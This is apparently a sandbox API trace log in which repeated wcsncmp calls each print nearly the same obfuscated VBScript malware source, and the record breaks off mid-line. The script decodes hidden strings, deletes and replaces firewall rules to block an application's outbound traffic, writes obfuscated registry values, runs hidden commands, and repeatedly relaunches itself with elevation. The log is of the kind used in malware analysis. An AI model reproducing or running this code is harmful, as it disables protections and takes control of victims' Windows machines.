65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0222.940] wcsncmp (_String1="sc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.940] wcsncmp (_String1="c(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.940] wcsncmp (_String1="(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.940] wcsncmp (_String1="Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 